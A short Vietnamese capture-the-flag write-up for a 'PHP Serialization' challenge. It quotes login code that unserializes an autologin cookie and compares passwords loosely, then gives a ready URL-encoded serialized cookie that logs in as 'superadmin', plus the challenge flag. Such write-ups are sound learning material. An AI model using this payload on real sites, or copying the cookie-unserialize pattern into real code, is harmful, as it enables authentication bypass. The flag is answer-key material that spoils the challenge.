# PHP Serialization

Xem sorce code ta có:

```php
if(!isset($_SESSION['login']) || !$_SESSION['login']) {
    $_SESSION['login'] = "";
    // form posted ?
    if($_POST['login'] && $_POST['password']){
        $data['login'] = $_POST['login'];
        $data['password'] = hash('sha256', $_POST['password']);
    }
    // autologin cookie ?
    else if($_COOKIE['autologin']){
        $data = unserialize($_COOKIE['autologin']);
        $autologin = "autologin";
    }

    // check password !
    if ($data['password'] == $auth[ $data['login'] ] ) {
        $_SESSION['login'] = $data['login'];

        // set cookie for autologin if requested
        if($_POST['autologin'] === "1"){
            setcookie('autologin', serialize($data));
        }
    }
    else {
        // error message
        $message = "Error : $autologin authentication failed !";
    }
}
```

Xem kĩ đoạn sau :

```php
if ($data['password'] == $auth[ $data['login'] ] ) {
        $_SESSION['login'] = $data['login'];

        // set cookie for autologin if requested
        if($_POST['autologin'] === "1"){
            setcookie('autologin', serialize($data));
        }
    }
```

Ta chỉ cần cho $data['password'] = true, $data['login'] = "superadmin", sau đó serialize $data và lấy giá trị tìm được gán cho 1 cookie autologin sẽ được thêm vào trên header qua Burp

Tóm lại ta sẽ thêm `autologin=%61%3a%32%3a%7b%73%3a%35%3a%22%6c%6f%67%69%6e%22%3b%73%3a%31%30%3a%22%73%75%70%65%72%61%64%6d%69%6e%22%3b%73%3a%38%3a%22%70%61%73%73%77%6f%72%64%22%3b%62%3a%31%3b%7d` (vế phải là url encode của : `a:2:{s:5:"login";s:10:"superadmin";s:8:"password";b:1;}`) vào trong Cookies 

---

### Flag:

`NoUserInputInPHPSerialization!`

